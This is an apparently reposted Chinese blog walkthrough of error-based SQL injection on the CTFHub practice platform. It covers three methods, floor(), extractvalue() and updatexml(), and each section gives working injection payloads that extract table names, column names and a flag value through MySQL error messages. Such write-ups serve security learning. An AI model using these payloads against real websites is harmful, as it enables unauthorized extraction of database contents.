博客
关于我
CTFHub_技能树_Web之SQL注入——报错注入(含三种解法)
阅读量:793 次
发布时间:2019-03-25

本文共 2285 字,大约阅读时间需要 7 分钟。

报错注入是一种在Web应用中揭示数据库信息的技术,主要通过利用特定的函数来构造自查错误,进而获取所需数据。本文将详细介绍报错注入的原理及其使用的函数,并通过实际示例展示注入过程。

一、报错注入原理

报错注入运作的核心在于利用某些数据库函数对输入参数进行处理,导致发至数据库的查询语句中包含所需的信息。以下是常用函数的原理:

1. floor()原理

floor()函数用于向下取整。对于报错注入,可以利用该函数获取特定信息。例如,当构造一个查询时,使用floor函数将随机数域与信息数据结合,通过报错信息提取出表名或其他数据库信息。

2. extractvalue()、updatexml()原理

这两个函数主要用于处理XML数据。extractvalue()用于从XML中提取指定路径的数据,而updatexml()则用于修改XML数据,返回修改后的内容。通过将数据库查询嵌入到这些函数的参数中,可以控制报错信息,从而获取所需数据或信息。

二、注入过程示例

Ⅰ、使用floor()

  • 查询表名

    ?id=1 and(select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x)a)

    该查询尝试获取当前数据库中的表名。floor(rand(0)*2)生成一个随机数域,结合information_schema.tables中表名,通过报错信息提取出表名。

    报错示例:

    Duplicate entry 'flag1' for key 'group_key'

    通过注入过程,可以发现数据库中包含多个表,需要进一步限制查询范围。

  • 查询列名

    ?id=1 and(select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name="flag"),floor(rand(0)*2))x from information_schema.tables group by x)a)

    该查询针对已知的表名获取列名。通过报错信息,可以查看具体的列是否存在,并提取列名。

  • 查值

    ?id=1 and(select 1 from(select count(*),concat((select flag from flag),floor(rand(0)*2))x from information_schema.tables group by x)a)

    该查询用于从表中获取特定的字段值。通过报错信息,可以获取字段值。

  • Ⅱ、使用extractvalue()

  • 查询表名

    ?id=1 and (extractvalue(1,concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 1,1))))

    该查询尝试提取指定路径中的内容。使用0x5c生成反斜杠,结合table_name,形成有效的XPATH路径,提取表名。

    报错示例:

    XPATH syntax error: '\flag'

    通过修正XPATH路径,可以正确提取表名。

  • 查询列名

    ?id=1 and (extractvalue(1,concat(0x5c,(select column_name from information_schema.columns where table_name="flag"))))

    该查询用于获取指定表的列名。通过构造有效的XPATH路径,提取列名。

  • 查值

    ?id=1 and (extractvalue(1,concat(0x5c,(select flag from flag))))

    该查询用于获取特定字段的值。通过构造有效的XPATH路径,提取字段值。

  • Ⅲ、使用updatexml()

  • 查询表名

    ?id=1 and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1))

    该查询尝试修改XML数据中的内容。通过构造标签和特定路径,通过报错信息获取表名。

    报错示例:

    XPATH syntax error: '~flag~'

    通过修正标签,确保XPATH路径正确,可以交互获取所需信息。

  • 查询列名

    ?id=1 and(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name="flag"),0x7e),1))

    该查询用于获取指定表的列名。通过构造有效的标签和XPATH路径,提取列名。

  • 查值

    ?id=1 and(updatexml(1,concat(0x7e,(select flag from flag),0x7e),1))

    该查询用于获取特定字段的值。通过构造有效的标签和XPATH路径,提取字段值。

  • 转载地址:http://gppuk.baihongyu.com/

    你可能感兴趣的文章
    OpenCV与AI深度学习 | 初学者指南 -- 什么是迁移学习?
    查看>>
    OpenCV与AI深度学习 | 十分钟掌握Pytorch搭建神经网络的流程
    查看>>
    OpenCV与AI深度学习 | 基于GAN的零缺陷样本产品表面缺陷检测
    查看>>
    OpenCV与AI深度学习 | 基于OpenCV和深度学习预测年龄和性别
    查看>>
    OpenCV与AI深度学习 | 基于OpenCV实现模糊检测 / 自动对焦
    查看>>
    OpenCV与AI深度学习 | 基于Python和OpenCV将图像转为ASCII艺术效果
    查看>>
    OpenCV与AI深度学习 | 基于PyTorch实现Faster RCNN目标检测
    查看>>
    OpenCV与AI深度学习 | 基于PyTorch语义分割实现洪水识别(数据集 + 源码)
    查看>>
    OpenCV与AI深度学习 | 基于YOLO11的车体部件检测与分割
    查看>>
    OpenCV与AI深度学习 | 基于YoloV11自定义数据集实现车辆事故检测(有源码,建议收藏!)
    查看>>
    OpenCV与AI深度学习 | 基于YOLOv8 + BotSORT实现球员和足球检测与跟踪 (步骤 + 源码)
    查看>>
    OpenCV与AI深度学习 | 基于YOLOv8实现高级目标检测和区域计数
    查看>>
    OpenCV与AI深度学习 | 基于YOLOv8的停车对齐检测
    查看>>
    OpenCV与AI深度学习 | 基于YoloV8的药丸/片剂类型识别
    查看>>
    OpenCV与AI深度学习 | 基于YOLO和EasyOCR从视频中识别车牌
    查看>>
    OpenCV与AI深度学习 | 基于图像处理的火焰检测算法(颜色+边缘)
    查看>>
    OpenCV与AI深度学习 | 基于拉普拉斯金字塔实现图像融合(步骤 + 代码)
    查看>>
    OpenCV与AI深度学习 | 基于机器视觉的磁瓦表面缺陷检测方案
    查看>>
    OpenCV与AI深度学习 | 基于深度学习的轮胎缺陷检测系统
    查看>>
    OpenCV与AI深度学习 | 如何使用YOLO-World做目标检测
    查看>>